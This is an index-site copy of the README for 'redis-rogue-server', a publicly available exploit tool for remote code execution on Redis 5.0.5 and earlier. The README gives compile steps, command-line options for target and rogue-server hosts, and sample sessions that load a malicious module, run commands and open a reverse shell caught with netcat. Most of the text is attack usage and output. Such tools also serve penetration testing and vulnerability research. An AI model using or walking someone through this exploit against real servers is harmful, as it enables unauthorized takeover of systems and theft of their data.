Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/n0b0dyCN/redis-rogue-server

Redis(<=5.0.5) RCE
https://github.com/n0b0dyCN/redis-rogue-server

rce redis

Last synced: 3 months ago
JSON representation

Redis(<=5.0.5) RCE

Host: GitHub
URL: https://github.com/n0b0dyCN/redis-rogue-server
Owner: n0b0dyCN
License: apache-2.0
Created: 2019-07-07T17:39:37.000Z (over 5 years ago)
Default Branch: master
Last Pushed: 2023-09-24T01:43:52.000Z (about 1 year ago)
Last Synced: 2024-05-02T17:53:07.835Z (6 months ago)
Topics: rce, redis
Language: C
Homepage:
Size: 237 KB
Stars: 936
Watchers: 7
Forks: 189
Open Issues: 4
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-hacking-lists - n0b0dyCN/redis-rogue-server - Redis(<=5.0.5) RCE (C)

README

        # Redis Rogue Server

A exploit for Redis(<=5.0.5) RCE, inspired by [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf).

__Support interactive shell and reverse shell!__

## Requirements

Python 3.6+

If you want to modify or recompile the redis module, you also require `make`.

## Usage

Compile exploit:

``` bash

cd RedisModulesSDK/exp/

make

```

Copy the .so file to same folder with `redis-rogue-server.py`.

```

➜ ./redis-rogue-server.py -h

______         _ _      ______                         _____                          

| ___ \       | (_)     | ___ \                       /  ___|                         

| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 

|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|

| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   

\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   

                                     __/ |                                            

                                    |___/                                             

@copyright n0b0dy @ r3kapig

Usage: redis-rogue-server.py [options]

Options:

  -h, --help           show this help message and exit

  --rhost=REMOTE_HOST  target host

  --rport=REMOTE_PORT  target redis port, default 6379

  --lhost=LOCAL_HOST   rogue server ip

  --lport=LOCAL_PORT   rogue server listen port, default 21000

  --exp=EXP_FILE       Redis Module to load, default exp.so

  -v, --verbose        Show full data stream

```

## Example

### Interactive shell

```

➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1

______         _ _      ______                         _____                          

| ___ \       | (_)     | ___ \                       /  ___|                         

| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 

|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|

| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   

\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   

                                     __/ |                                            

                                    |___/                                             

@copyright n0b0dy @ r3kapig

[info] TARGET 127.0.0.1:6379

[info] SERVER 127.0.0.1:21000

[info] Setting master...

[info] Setting dbfilename...

[info] Loading module...

[info] Temerory cleaning up...

What do u want, [i]nteractive shell or [r]everse shell: i

[info] Interact mode start, enter "exit" to quit.

[<<] whoami

[>>] :n0b0dy

[<<] 

```

### Reverse shell

Invoke reverse shell:

```

➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1

______         _ _      ______                         _____

| ___ \       | (_)     | ___ \                       /  ___|

| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __

|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|

| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |

\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|

                                     __/ |

                                    |___/

@copyright n0b0dy @ r3kapig

[info] TARGET 127.0.0.1:6379

[info] SERVER 127.0.0.1:21000

[info] Setting master...

[info] Setting dbfilename...

[info] Loading module...

[info] Temerory cleaning up...

What do u want, [i]nteractive shell or [r]everse shell: r

[info] Open reverse shell...

Reverse server address: 127.0.0.1

Reverse server port: 9999

[info] Reverse shell payload sent.

[info] Check at 127.0.0.1:9999

[info] Unload module...

```

Receive reverse shell:

```

➜ nc -lvvp 9999

Listening on [0.0.0.0] (family 0, port 9999)

Connection from localhost.localdomain 39312 received!

whoami

n0b0dy

```

## Thanks

* [RicterZ](https://github.com/RicterZ)'s redis exec module: